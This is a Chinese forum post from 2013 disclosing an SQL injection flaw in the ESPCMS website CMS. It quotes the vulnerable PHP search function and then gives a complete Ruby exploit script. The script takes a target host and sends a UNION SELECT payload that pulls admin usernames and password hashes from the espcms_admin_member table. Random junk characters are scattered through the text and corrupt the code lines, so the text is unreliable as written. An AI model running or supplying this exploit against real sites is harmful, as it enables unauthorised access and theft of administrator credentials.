0×0 漏洞概述0×1 漏洞细节4 r: f; q* J1 X6 \+ F
0×2 PoC
7 K$ Z( w! u( I! d8 P) P# }' Q9 x
5 X& r, E9 d y7 m, I+ @4 X6 G9 g
) f6 z. m0 z% l: b, [" h4 `0×0 漏洞概述+ f- ]! M: z! q1 ?2 h1 f! N
5 l' o8 P, Z) ~' e; n% o
易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。
/ C [1 H( n$ Z其在处理传入的参数时考虑不严谨导致SQL注入发生% R% c1 u8 v$ d. x; Q
9 T, y- b2 i) B) l& O7 \. H8 `
: v$ ^2 T* G) F( i- u0×1 漏洞细节8 @; L2 K$ h. a, f1 \/ _7 v7 U
8 ?9 f- j. n" y变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query,整个过程无过滤导致了注入的发生。
/ F1 d, X* I- E# O' M8 ]$ b8 q0 @& D正因为变量是从$_SERVER['QUERY_STRING']中去取的,所以正好避开了程序的过滤。
1 Y+ g1 ~0 ]4 r* i而注入的变量是数组的值,并非数组的key,所以也没过被过滤,综合起来形成了一个比较少见的SQL注入。
9 B: @1 i! q. M% | j& w
/ p* l4 I# F- P) [% }在/interface/3gwap_search.php文件的in_result函数中:- |. ~3 C& L1 _
; y/ x# t7 y' V# F% I; C- J: c+ `. j0 x
' P8 V! O: |8 b9 g function in_result() {1 X' O* w+ H( B6 P" [; I7 f/ C4 i: W
... ... ... ... ... ... ... ... ...
' V) @3 w$ J5 p9 K9 c $urlcode = $_SERVER[ 'QUERY_STRING '];
7 E8 Q/ c, s7 u parse_str(html_entity_decode($urlcode), $output);7 ~0 O8 z( e- t" J1 l+ f* X' S
! l4 m9 Y6 E( G: E6 C* v- X
... ... ... ... ... ... ... ... ...
3 I. ~5 ?0 O8 L" X" \# l4 C if (is_array($output['attr' ]) && count($output['attr']) > 0) {
7 A" `- W& Z% m3 s$ r5 B8 H) U
5 P' @5 z; v, z5 C! P $db_table = db_prefix . 'model_att';$ o+ \( g5 [( _3 [( ~& f" Z
) `, r6 W4 J6 o8 [5 a6 M; k foreach ($output['attr' ] as $key => $value) {
. A( e, T' P. ^: @, T if ($value) {
3 L% p5 N& c0 K: U1 D6 J* j; N4 K
/ `5 S4 f! r1 w! f2 U5 p- [ $key = addslashes($key);
+ |9 k7 j4 S7 m3 |! V. o4 n7 k $key = $this-> fun->inputcodetrim($key);
3 `: Z" v8 X- N6 @ $db_att_where = " WHERE isclass=1 AND attrname='$key'";
; m8 W/ k1 f/ \1 ]+ O' u $countnum = $this->db_numrows($db_table, $db_att_where);
/ K( B, O/ y9 H, P4 h if ($countnum > 0) {8 l7 t1 i) t# z# x! I
$db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;
; j& b I) r* X/ e/ C. a$ h3 y }
8 M2 M( A6 H6 R9 C) `2 A, L }9 _7 @$ F5 a, Y/ c5 ?/ ]# ~
}
9 h5 P7 }, ^# Z6 X$ K$ E) z1 V }# P2 n( L% `" L0 n
if (!empty ($keyword) && empty($keyname)) {
4 x; R0 ?; N1 Y" f" M $keyname = 'title';0 q7 F/ g9 h( T) r
$db_where.= " AND a.title like '%$keyword%'" ;% q G; v9 h: W- m
} elseif (!empty ($keyword) && !empty($keyname)) {& K% o/ `" `8 Q+ i0 z. T) b
$db_where.= " AND $keyname like '% $keyword%'";
9 y; W" `+ N1 t$ ?- ]) Q! g) X2 i }: \4 B" h: c& A( S$ c9 U
$pagemax = 15; f* `8 s/ @2 }2 _* L# S
1 e4 K2 C# j6 ~! l' ]+ {5 p! U $pagesylte = 1;
" w ^7 {, C' I; k$ J: n8 g8 Z
+ D/ j2 G* g# C9 W( V- I if ($countnum > 0) {
O7 W% O6 U' g! A8 z# ^
6 o l4 ?; {5 v y) L $numpage = ceil($countnum / $pagemax);
- J. o; ~6 @5 M8 @" a y& r } else {2 @) y4 M/ ]$ J6 j; Z2 X/ D0 G
$numpage = 1;4 r7 m' o9 }2 \
}3 c" W/ X4 B0 M7 L3 Y; L' P9 f
$sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
, L; y, \5 k- N3 d% @8 ~" H7 L* C $this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);
8 a. j2 ?2 t7 o* V4 ^. }9 {4 h$sql = $this-> htmlpage->PageSQL('a.did' , 'down' ); $rs = $this->db->query($sql);8 {4 `7 i D% m; L4 ?8 O9 Y0 n
... ... ... ... ... ... ... ... .... W" E, A/ [5 v5 H3 ~
}* ?5 i# r. J% Y
5 {: y0 Z* A4 p$ }3 D. Q2 `( l% c2 T( b
0×2 PoC3 H6 L! N9 @6 T5 U' Y" @' r
}7 A( m+ j5 r& ?# T/ N$ n
$ R+ r- [. `0 r, U
1 ^; z, U1 U2 W/ p6 c" lrequire "net/http"# o) z& T# `2 ~- j( [" L2 y [
6 {5 Z$ _3 v y* |# J- v) j
def request(method, url)' W9 z! A4 z4 ]
if method.eql?("get")
' X/ j4 \1 ]9 {1 D uri = URI.parse(url)
+ L0 C: l2 ]1 [ http = Net::HTTP.new(uri.host, uri.port)
, l" q U" z" B response = http.request(Net::HTTP::Get.new(uri.request_uri))2 n7 J6 R# h1 Y: C
return response
/ |/ T. Q8 w. |; z2 r end
' \( ?1 s# @* ~7 o" Tend
- c: Z9 f" y8 R5 @0 W5 b+ i+ ]2 ~: o% n& ?4 w
doc =<<HERE" ] ?' i$ W! [7 j
-------------------------------------------------------
+ l/ _3 k" E. ?+ IEspcms Injection Exploit
& D& B; `' Z1 Z/ c2 QAuthor:ztz
6 M3 n: ^$ @9 TBlog:http://ztz.fuzzexp.org/
7 Z4 O2 A5 n2 A( T; Q* l+ W4 L-------------------------------------------------------$ f- f0 d* h/ P; e$ [/ j) R- p) e7 i
5 e7 Y6 L/ o! E2 {% a
HERE6 N- x8 f" q# D! s6 B# P
: |5 X1 L* \5 [" P2 g4 p- Wusage =<<HERE# Y+ {/ H/ S1 ^& e( }
Usage: ruby #{$0} host port path
3 K8 m5 o& Q0 z6 `example: ruby #{$0} www.target.com 80 /! {/ g$ I6 z. N0 e% V p
HERE2 a- u% z x7 j5 q9 l6 m- f, X
) [ U& T% D( D7 @: X. Q6 Xputs doc& Q5 x9 C7 t6 Q6 a6 L. D
if ARGV.length < 3) W0 Y( k" f5 r! p9 ~
puts usage1 ?( r7 N7 v, H3 y; a" p9 {( h
else
& s6 ]. _4 k( y2 M+ V $host = ARGV[0]
) d7 p( ^& n! _/ x) _) g' @ B $port = ARGV[1]
# z" j# f" u0 Z! Y: u9 I" c' H2 u! W $path = ARGV[2]
) r, e/ e+ V- f; N3 V3 ?; c) s+ {( R* V; f
puts "send request..."5 h! |: d( v. U) o
url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&( C8 O. s4 ?1 |8 k/ \/ d
attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
6 k" ]# J8 G5 y& z0 \& `8 c, P( z,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27
: ~6 L6 k* w& Y5 s: A/ a6 k. \,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
/ P* K) W( g- a; [: [1 l4 f response = request("get", url)
% S9 f7 i3 k* i3 Z1 U& Z2 [8 D result = response.body.scan(/\w+&\w{32}/)
) x0 x5 M( C" n5 C, C2 O puts result
& q7 D/ a3 i. e, L; p' vend0 _- R/ j' `' z! h
5 o1 {) c8 C8 a3 J% U |
发表于 2013-7-27 18:31:52
收藏
支持
反对